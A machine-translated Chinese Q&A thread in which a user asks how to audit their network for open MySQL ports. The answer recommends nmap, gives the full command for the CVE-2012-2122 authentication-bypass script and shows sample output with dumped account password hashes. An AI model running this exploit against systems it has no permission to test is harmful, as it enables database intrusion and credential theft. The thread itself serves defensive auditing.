以下问题:
我想检查网络中的所有开放MySQL端口,并给自己一个列表。
这只是一个安全检查脚本,可以避免其他人访问数据库。
Bash / perl / Powershell ......也许有人可以给我一个提示?
答案 0 :(得分:3)
您可以使用NMAP进行所有端口扫描任务。
修改
让我们举个例子:mysql-vuln-cve2012-2122(此漏洞试图通过绕过身份验证通过开放端口访问MySql服务器,如果可能,还会转储MySQL用户名和密码哈希。)
先决条件:您需要' Vulns'库要单独安装。请阅读文档,了解有关如何安装和其他详细信息的更多信息,因为在此处解释它会太繁琐。
mysql-vuln-cve2012-2122.pass
MySQL password. Default: nmapFTW.
mysql-vuln-cve2012-2122.user
MySQL username. Default: root.
mysql-vuln-cve2012-2122.iterations
Connection retries. Default: 1500.
mysql-vuln-cve2012-2122.socket_timeout
Socket timeout. Default: 5s.
请将密码留空以检查是否存在非密码漏洞。
要运行的命令:
nmap -p3306 --script mysql-vuln-cve2012-2122 <target>
这是你的MySql实例
这将给出一个输出,如下所示:
PORT STATE SERVICE REASON
3306/tcp open mysql syn-ack
mysql-vuln-cve2012-2122:
VULNERABLE:
Authentication bypass in MySQL servers.
State: VULNERABLE
IDs: CVE:CVE-2012-2122
Description:
When a user connects to MariaDB/MySQL, a token (SHA
over a password and a random scramble string) is calculated and
compared
with the expected value. Because of incorrect casting, it might've
happened that the token and the expected value were considered
equal,
even if the memcmp() returned a non-zero value. In this case
MySQL/MariaDB would think that the password is correct, even while
it is
not. Because the protocol uses random strings, the probability of
hitting this bug is about 1/256.
Which means, if one knows a user name to connect (and "root"
almost
always exists), she can connect using *any* password by repeating
connection attempts. ~300 attempts takes only a fraction of
second, so
basically account password protection is as good as nonexistent.
Disclosure date: 2012-06-9
Extra information:
Server granted access at iteration #204
root:*9CFBBC772F3F6C106020035386DA5BBBF1249A11
debian-sys-maint:*BDA9386EE35F7F326239844C185B01E3912749BF
phpmyadmin:*9CFBBC772F3F6C106020035386DA5BBBF1249A11
有关更多详细信息,请参阅以上链接。
NMAP工具不仅可以帮助您获取与端口相关的漏洞列表。它还可以用于搜索其他漏洞,如MySql注入,DDOS,暴力漏洞等等。虽然您需要为这些库下载单独的库。